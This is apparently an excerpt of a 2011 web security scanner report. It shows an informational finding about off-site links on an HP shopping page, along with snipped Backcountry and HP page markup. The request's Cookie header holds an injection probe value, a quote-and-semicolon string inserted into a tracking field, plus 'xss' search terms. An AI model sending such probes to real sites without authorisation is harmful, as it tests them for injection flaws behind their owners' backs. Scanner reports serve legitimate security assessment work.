<body id="cart" class="bcs">


<script type="text/javascript" src="//media.richrelevance.com/rrserver/js/1.0/p13n.js"></script>
...[SNIP]...
<li id="helpme">
           <a name="help" rel="nofollow" target="_self" href="http://sales.liveperson.net/hc/s-9551721/cmd/kbresource/kb-8572871580548821431/front_page!PAGETYPE?VisitorProfile=BCS" class="last_link">Help</a>
...[SNIP]...
<noscript>
<a href="https://sales.liveperson.net/hc/9551721/?cmd=file&amp;file=visitorWantsToChat&amp;site=9551721&amp;byhref=1&amp;AEPARAMS&amp;SESSIONVAR!StaticButtonNameNoScript=Generic" title="Live Chat" target="chat9551721">Live Chat</a>
...[SNIP]...
</p>
                       <a name="domestic_and_military_shipping" rel="nofollow" target="_self" href="http://sales.liveperson.net/hc/s-9551721/cmd/kbresource/view_question!PAGETYPE?VisitorProfile=BCS&amp;sf=101133&amp;documentid=239669&amp;action=view">Domestic and US Military Shipping</a><br />
                       <a name="international_shipping" rel="nofollow" target="_self" href="http://sales.liveperson.net/hc/s-9551721/cmd/kbresource/view_question!PAGETYPE?VisitorProfile=BCS&amp;sf=101133&amp;documentid=239532&amp;action=view">International Shipping</a>
...[SNIP]...
<li id="outlet"><a name="outlet" href="http://www.departmentofgoods.com/" target="_new">Outlet</a>
...[SNIP]...
<li><a rel="nofollow" name="contact_us" target="_self" href="http://sales.liveperson.net/hc/s-9551721/cmd/kbresource/view_question!PAGETYPE?VisitorProfile=BCS&amp;sf=101133&amp;documentid=239499&amp;action=view">Contact Us</a>
...[SNIP]...
<li><a rel="nofollow" name="help_center" target="_self" href="http://sales.liveperson.net/hc/s-9551721/cmd/kbresource/kb-8572871580548821431/front_page!PAGETYPE?VisitorProfile=BCS">Help Center</a>
...[SNIP]...
<li><a rel="nofollow" name="return_policy" target="_self" href="http://sales.liveperson.net/hc/s-9551721/cmd/kbresource/view_question!PAGETYPE?VisitorProfile=BCS&amp;sf=101133&amp;documentid=239621&amp;action=view&amp;MESSAGEVAR!home=no&amp;MESSAGEVAR!cookie=no">Return Policy</a>
...[SNIP]...
<li><a name="about_backcountry" href="http://www.backcountrycorp.com/corporate/section/1/store/bcs/store_detail.html">About Backcountry</a>
...[SNIP]...
<li><a name="jobs" href="http://www.backcountrycorp.com/corporate/section/2/jobs.html">Jobs</a>
...[SNIP]...
<li><a name="affiliate_program" href="http://www.backcountrycorp.com/corporate/section/5/afp/bcs-4-4/Program_Overview.html">Affiliate Program</a>
...[SNIP]...
<li><a rel="nofollow" name="group_sales" target="_self" href="http://sales.liveperson.net/hc/s-9551721/cmd/kbresource/view_question!PAGETYPE?VisitorProfile=BCS&amp;sf=101133&amp;documentid=242956&amp;action=view">Group Sales</a>
...[SNIP]...
<li><a name="press_media" href="http://www.backcountrycorp.com/corporate/section/3/press_media.html">Press / Media</a>
...[SNIP]...
<li><a name="tw" href="http://twitter.com/backcountrycom" target="_blank" id="twitter_link">Follow us on Twitter</a>
...[SNIP]...
<li id="f_shipping"><a rel="nofollow" name="free_shipping" target="_self" href="http://sales.liveperson.net/hc/s-9551721/cmd/kbresource/view_question!PAGETYPE?VisitorProfile=BCS&amp;sf=101133&amp;documentid=239669&amp;action=view">Free Shipping</a>
...[SNIP]...
<li id="guarantee"><a rel="nofollow" name="100_guaranteed" target="_self" href="http://sales.liveperson.net/hc/s-9551721/cmd/kbresource/view_question!PAGETYPE?VisitorProfile=BCS&amp;sf=101133&amp;documentid=239621&amp;action=view">100% Guaranteed</a>
...[SNIP]...
<li id="experts"><a rel="nofollow" name="talk_to_gear_experts" target="_self" href="http://sales.liveperson.net/hc/s-9551721/cmd/kbresource/view_question!PAGETYPE?VisitorProfile=BCS&amp;sf=101133&amp;documentid=239499&amp;action=view">Talk to Gear Experts</a>
...[SNIP]...
</ul>
       
<iframe src="http://www.facebook.com/plugins/likebox.php?id=5461604986&amp;width=292&amp;stream=false&amp;header=false" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:227px; height:75px; background:#E6E3D4; margin-top:20px; border:1px solid #CBC7B9"></iframe>
...[SNIP]...
<li id="bizRate"><a name="4_years_in_a_row" href="http://www.bizrate.com/boutique/2007circleofexcellence.html">BizRate Award Winner<br />
...[SNIP]...
<li id="internet_retailer"><a name="best_of_the_best" href="http://www.internetretailer.com/article.asp?id=20674">Internet Retailer Top 50<br />
...[SNIP]...
</script>


<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/yahoo-dom-event/yahoo-dom-event.js&amp;2.7.0/build/animation/animation-min.js&amp;2.7.0/build/connection/connection-min.js&amp;2.7.0/build/datasource/datasource-min.js&amp;2.7.0/build/autocomplete/autocomplete-min.js&amp;2.7.0/build/dragdrop/dragdrop-min.js&amp;2.7.0/build/container/container-min.js&amp;2.7.0/build/imageloader/imageloader-min.js&amp;2.7.0/build/selector/selector-min.js&amp;2.7.0/build/slider/slider-min.js&amp;2.7.0/build/menu/menu-min.js&amp;2.7.0/build/element/element-min.js&amp;2.7.0/build/button/button-min.js&amp;2.7.0/build/history/history-min.js&amp;2.7.0/build/get/get-min.js"></script>
...[SNIP]...
<!-- mercent tag start -->
<script src="http://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://link.mercent.com/image.ashx?merchantID=Backcountry" style="display: none;"/>
</noscript>
...[SNIP]...
<noscript>
<img src="http://link.mercent.com/image.ashx?merchantID=Backcountry&type=shopper&id=TUtKhM3y&customerID=" style="display: none;"/>
</noscript>
...[SNIP]...

7.4. http://www.shopping.hp.com/design

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /design

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /design?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_accessories HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/go/touchpadfaqs;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_tablet_home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; prop12=r602; EMID=; s_depth=21; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Ampr%3Aportal%3Amain; 
s_cc=true; hpcompc_usen=cartExists=true; HP_EBUS=true; HP_EBUS_HP_CLICKS=4x19x11121; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Alanding%25253Astatic%25253Atouchpadfaqs%2526pidt%253D1%2526oid%253D%25252Fdesign_jumpid%25253Din_R329_prodexp%25252Fhhoslp%25252Fpsg%25252Flateralnav_accessories_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:17:37 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:17:38 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 148298

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps_he
...[SNIP]...
<!--stopindex-->


<link href="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/css/hp_screen_003366.css" rel="stylesheet" type="text/css" media="screen">
<link href="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/css/hp_handheld_003366.css" rel="stylesheet" type="text/css" media="handheld">
<link href="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/css/hp_print_003366.css" rel="stylesheet" type="text/css" media="print">


<script language="JavaScript">
...[SNIP]...
<!--stopindex-->

<script language="JavaScript" src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/jsi/newsletter_catalog_utils.js"></script>
<script type="text/javascript" language="JavaScript" src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/jsi/search_utils.js"></script>
...[SNIP]...
<a href="http://www.hp.com/?mtxs=logo&mtxb=store&jumpid=in_R329_prodexp%2Fhhoslp%2Fsplit%2Fhome" title="HP.com home"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/hp_logo_new.png" alt="HP.com home" border="0"></a>
...[SNIP]...
<h2 class="themeheader mb10" style="float: left; width: 73%;">


<img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/topnav_phone_icon.gif" height="20px" width="20px" align="absmiddle" alt="Call an HP Home & Home Office agent now.&#10Espa&ntilde;ol disponible, lunes a viernes 11 am -- 8 pm, hora del Este" title="Call an HP Home & Home Office agent now.&#10Espa&ntilde;ol disponible, lunes a viernes 11 am -- 8 pm, hora del Este">

<span title="Call an HP Home & Home Office agent now.&#10Espa&ntilde;ol disponible, lunes a viernes 11 am -- 8 pm, hora del Este" alt="Call an HP Home & Home Office agent now.&#10Espa&ntil
...[SNIP]...
</a>&nbsp;&nbsp;<img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/redesign/white_line.gif" height="10" width="1" alt="">&nbsp;&nbsp;
<a href="http://www.shopping.hp.com/webapp/shopping/help.do" class="themelink">
...[SNIP]...
</a>&nbsp;&nbsp;<img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/redesign/white_line.gif" height="10" width="1" alt="">&nbsp;&nbsp;<span id="signInLink">
...[SNIP]...
<a href="https://www.shopping.hp.com/webapp/shopping/cart_detail.do?view_cart=checkout" title="Proceed to shopping cart and checkout" style="cursor:pointer"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="14" height="13" border="0" alt="24 items in the cart" align="absmiddle"></a>
...[SNIP]...
</a>&nbsp;<img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="19" height="14" border="0" alt="Shopping Cart" align="absmiddle" id="cart">24 items: $8,159.76
</p>
...[SNIP]...
<td><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="5" height="1" border="0" alt=""></td>
...[SNIP]...
<a href="http://www.shopping.hp.com/webapp/shopping/store_access.do?template_type=product_detail&product_code=TD367AA%23ABA"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/td367aa_42.gif" alt="Microsoft Office Home And Student 2010 PKC (1 user, product key card)" width="40" height="40" border="0"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/webapp/shopping/store_access.do?template_type=product_detail&product_code=BV704AA%23ABA"><img src="http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/preview_fmt/bv704aa_main.jpg" alt="HP Pavilion p7-1020 Desktop PC" width="40" height="40" border="0"></a>
...[SNIP]...
<a href="javascript:openWin('http://www.shopping.hp.com/webapp/shopping/calculate_tax_shipping.do?runDM=false',325,700);" title="Pop-up window for shipping tax calculator"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/calc_icn.gif" width="14" height="19" border="0" title="Pop-up window for shipping tax calculator" alt="Pop-up window for shipping tax calculator"></a>
...[SNIP]...
<a href="https://www.shopping.hp.com/webapp/shopping/cart_detail.do?view_cart=checkout" title="Proceed to shopping cart and checkout"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/stdnav/button_view_cart_checkout.gif" border="0"></a>
...[SNIP]...
<td><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="5" height="1" border="0" alt=""></td>
...[SNIP]...
<!-- Modified    for    NG3    -->


<script    type="text/javascript" language="JavaScript" src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/jsi/topNav.js"></script>
...[SNIP]...
<h4 class="navDropdownsLink"    style="padding: 4px 10px;"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/hho_icon_home.gif"    title="Home" width="17"    height="20"    border="0"/></h4>
...[SNIP]...
http://www.shopping.hp.com/webapp/shopping/series_can.do?storeName=computer_store&landing=notebooks&a1=Category&v1=Mini&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_mini_notebooks"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/nb1_70.gif" width="70"    height="70"    border="0" title="Mini Netbooks"></a>
...[SNIP]...
app/shopping/series_can.do?storeName=computer_store&landing=notebooks&a1=Category&v1=Everyday%20computing&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_everyday_computing_notebooks"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/nb2_70.gif" width="70"    height="70"    border="0" title="Everyday Computing laptop PCs"></a>
...[SNIP]...
hp.com/webapp/shopping/series_can.do?storeName=computer_store&landing=notebooks&a1=Category&v1=Ultra-Portable&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_ultra-portable_notebooks"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/nb3_70.gif" width="70"    height="70"    border="0" title="Ultra-Portable laptop PCs"></a>
...[SNIP]...
/webapp/shopping/series_can.do?storeName=computer_store&landing=notebooks&a1=Category&v1=High%20performance&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_high_performance_notebooks"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/nb4_70.gif" width="70"    height="70"    border="0" title="High Performance laptop PCs"></a>
...[SNIP]...
http://www.shopping.hp.com/webapp/shopping/series_can.do?storeName=computer_store&landing=notebooks&a1=Category&v1=ENVY&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_envy_notebooks"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/nb5_70.gif" width="70"    height="70"    border="0" title="ENVY laptop PCs"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/can/computer/categories/notebook_batteries/1/accessories?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_notebook_batteries" class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/nb6_70.gif" width="70"    height="70"    border="0" title="Laptop batteries"></a>
...[SNIP]...
p/shopping/series_can.do?storeName=computer_store&landing=notebooks&a1=See%20all&v1=series&jumpID=in_R329_prodexp/hhoslp/psg/lateralnav_all_customizable_laptop_mini_netbook_series"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/nb7_70.gif" width="70"    height="70"    border="0" title="All customizable laptop PCs"></a>
...[SNIP]...
hopping.hp.com/webapp/shopping/can.do?storeName=storefronts&catLevel=1&landing=rts_notebook&category=rts_notebook&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_quick_ship_notebooks" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/nb8_70.gif" width="70"    height="70"    border="0" title="Quick-ship desktop PCs available to ship within 24 hours"></a>
...[SNIP]...
ebapp/shopping/series_can.do?storeName=computer_store&landing=desktops&a1=Category&v1=Everyday%20computing&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_everyday_computing_desktops"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/dt1_70.gif" width="70"    height="70"    border="0" title="Everyday computing desktop pcs"></a>
...[SNIP]...
g.hp.com/webapp/shopping/series_can.do?storeName=computer_store&landing=desktops&a1=Category&v1=Slim%20and%20sleek&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_slim_sleek_desktops"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/dt2_70.gif" width="70"    height="70"    border="0" title="Slim and sleek desktop PCs"></a>
...[SNIP]...
ing.hp.com/webapp/shopping/series_can.do?storeName=computer_store&landing=desktops&a1=Category&v1=All-in-One%20PCs&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_all_in_one_desktops"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/dt3_70.gif" width="70"    height="70"    border="0" title="All-in-One pcs"></a>
...[SNIP]...
.com/webapp/shopping/store_access.do?template_type=computer_store&landing=desktops&a1=Category&v1=TouchSmart%20PCs&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_TouchSmart_desktops"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/dt4_70.gif" width="70"    height="70"    border="0" title="TouchSmart All-in-One PCs"></a>
...[SNIP]...
om/webapp/shopping/series_can.do?storeName=computer_store&landing=desktops&a1=Category&v1=High%20performance&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_high_performance_desktops"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/dt5_70.gif" width="70"    height="70"    border="0" title="High performance desktop PCs"></a>
...[SNIP]...
ng.hp.com/webapp/shopping/series_can.do?storeName=computer_store&landing=desktops&a1=See+all&v1=series&jumpID=in_R329_prodexp/hhoslp/psg/lateralnav_all_customizable_desktop_series"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/dt6_70.gif" width="70"    height="70"    border="0" title="All customizable desktop PCs "></a>
...[SNIP]...
w.shopping.hp.com/webapp/shopping/can.do?storeName=storefronts&catLevel=1&landing=rts_desktop&category=rts_desktop&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_quick_ship_desktops"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/dt7_70.gif" width="70"    height="70"    border="0" title="Quick-ship desktop PCs available to ship within 24 hours"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/can/display/display/1/storefronts?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_monitors" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/dt8_70.gif" width="70"    height="70"    border="0" title="Monitors"></a>
...[SNIP]...
f="http://www.shopping.hp.com/webapp/shopping/can.do?storeName=storefronts&catLevel=1&landing=rts_tablet&category=rts_tablet&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_touchpads" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/tb2_70.gif" width="70"    height="70"    border="0" title="TouchPads"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/can/handheld/iPAQ/2/storefronts?sort=Desc&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_smartphones" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/tb3_70.gif" width="70"    height="70"    border="0" title="Smartphones"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/can/esp/Notebook/1/storefronts?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_extended_service_plan_notebooks" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/sh1_70.gif" width="70"    height="70"    border="0" title="HP Care Packs for Laptops"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/can/esp/Desktop/1/storefronts?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_services_desktops"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/sh2_70.gif" width="70"    height="70"    border="0" title="HP Care Packs for Desktops"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/can/esp/Printer/1/storefronts?jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_extended_service_plan_printers" class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/sh3_70.gif" width="70" height="70" border="0" title="HP Care Packs for Printers"></a>
...[SNIP]...
ef="http://www.shopping.hp.com/webapp/shopping/can.do?landing=printer&category=Photosmart&catLevel=1&storeName=storefronts&jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_photosmarts"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/p1_70.gif"    width="70" height="70" border="0"    title="Photosmart"></a>
...[SNIP]...
href="http://www.shopping.hp.com/webapp/shopping/can.do?landing=printer&category=Officejet&catLevel=1&storeName=storefronts&jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_officejets"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/p2_70.gif"    width="70" height="70" border="0"    title="Officejet"></a>
...[SNIP]...
ttp://www.shopping.hp.com/webapp/shopping/can.do?landing=printer&category=Officejet+Pro&catLevel=1&storeName=storefronts&jumpID=in_R329_prodexp/hhoslp/ipg/lateralnav_officejet_pro"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/p3_70.gif"    width="70" height="70" border="0"    title="Officejet Pro"></a>
...[SNIP]...
a href="http://www.shopping.hp.com/webapp/shopping/can.do?landing=printer&category=LaserJet&catLevel=1&storeName=storefronts&jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_laserjets"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/p4_70.gif"    width="70" height="70" border="0"    title="LaserJet"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/webapp/shopping/can.do?landing=printer&category=Deskjet&catLevel=1&storeName=storefronts&jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_deskjets"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/p5_70.gif"    width="70" height="70" border="0"    title="Deskjet"></a>
...[SNIP]...
ww.shopping.hp.com/webapp/shopping/can.do?landing=printer&category=all-in-one&catLevel=1&storeName=storefronts&jumpID=in_R329_prodexp/hhoslp/ipg/lateralnav_multi_function_printers" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/p6_70.gif"    width="70" height="70" border="0"    title="All all-in-one printers"></a>
...[SNIP]...
Name=storefronts&landing=printer&category=HP&orderflow=1&a1=Wireless+capability%0D%0A&v1=Yes&catLevel=2#bcAnchor&jumpID=in_R329_prodexp/hhoslp/ipg/lateralnav_wireless_all_printers" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/p7_70.gif"    width="70" height="70" border="0"    title="All wireless printers"></a>
...[SNIP]...
shopping.hp.com/webapp/shopping/can.do?landing=printer&lanAttr=HP+ePrint&category=Yes&catLevel=1&storeName=storefronts&jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_eprint_printers"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/p8_70.gif"    width="70" height="70" border="0"    title="All ePrint printers"></a>
...[SNIP]...
w.shopping.hp.com/webapp/shopping/print_supp_acc_landing.do?landing=supplies&selectMenu=cartridges_paper&suppliesType=ink&jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_ink_supplies"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/s1_70.gif"    width="70" height="70" border="0"    title="Ink"></a>
...[SNIP]...
opping.hp.com/webapp/shopping/print_supp_acc_landing.do?landing=supplies&selectMenu=cartridges_paper&suppliesType=toner&jumpID=in_R329_prodexp/hhoslp/ipg/lateralnav_toner_supplies"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/s2_70.gif"    width="70" height="70" border="0"    title="Toner"></a>
...[SNIP]...
f="http://www.shopping.hp.com/webapp/shopping/supplies_category.do?landing=printing_supplies&category=paper&cat_level=1?jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_paper_supplies"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/s3_70.gif"    width="70" height="70" border="0"    title="Paper"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/accessories-store/computer?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_all_electronics"    class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/mp1_70.gif" width="70"    height="70"    border="0" title="All electronics"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/can/computer/categories/tvs/1/accessories?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_tvs" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/mp2_70.gif" width="70"    height="70"    border="0" title="TVs"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/can/computer/categories/digital_cameras/1/accessories?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_digital_cameras" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/mp3_70.gif" width="70"    height="70"    border="0" title="Cameras &amp; video"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/design?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_deals_on_electronics"     class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/mp4_70.gif" width="70"    height="70"    border="0" title="Deals on electronics"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/can/computer/categories/photo_frames/1/accessories?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_lateralnav_photo_frames"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/mp5_70.gif" width="70"    height="70"    border="0" title="Photo frames"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/can/calculator/HP/1/storefronts?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_calculators" class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/mp6_70.gif" width="70"    height="70"    border="0" title="Calculators"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/can/computer/categories/software/1/accessories?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_software" class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/mp7_70.gif" width="70"    height="70"    border="0" title="Boxed Software"></a>
...[SNIP]...
<p align="center" class="col21pctL    p5 m0"><a    href="http://hp.digitalriver.com/store/hpappli/DisplayHomePage/?jumpid=ex_hpds_lateralnav_download" class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/mp8_70.gif" width="70"    height="70"    border="0" title="Downloadable Software (non-HP, partner site)"></a><br><a    href="http://hp.digitalriver.com/store/hpappli/DisplayHomePage/?jumpid=ex_hpds_lateralnav_download" class="colorFFFFFF">Downloadable<br>
...[SNIP]...
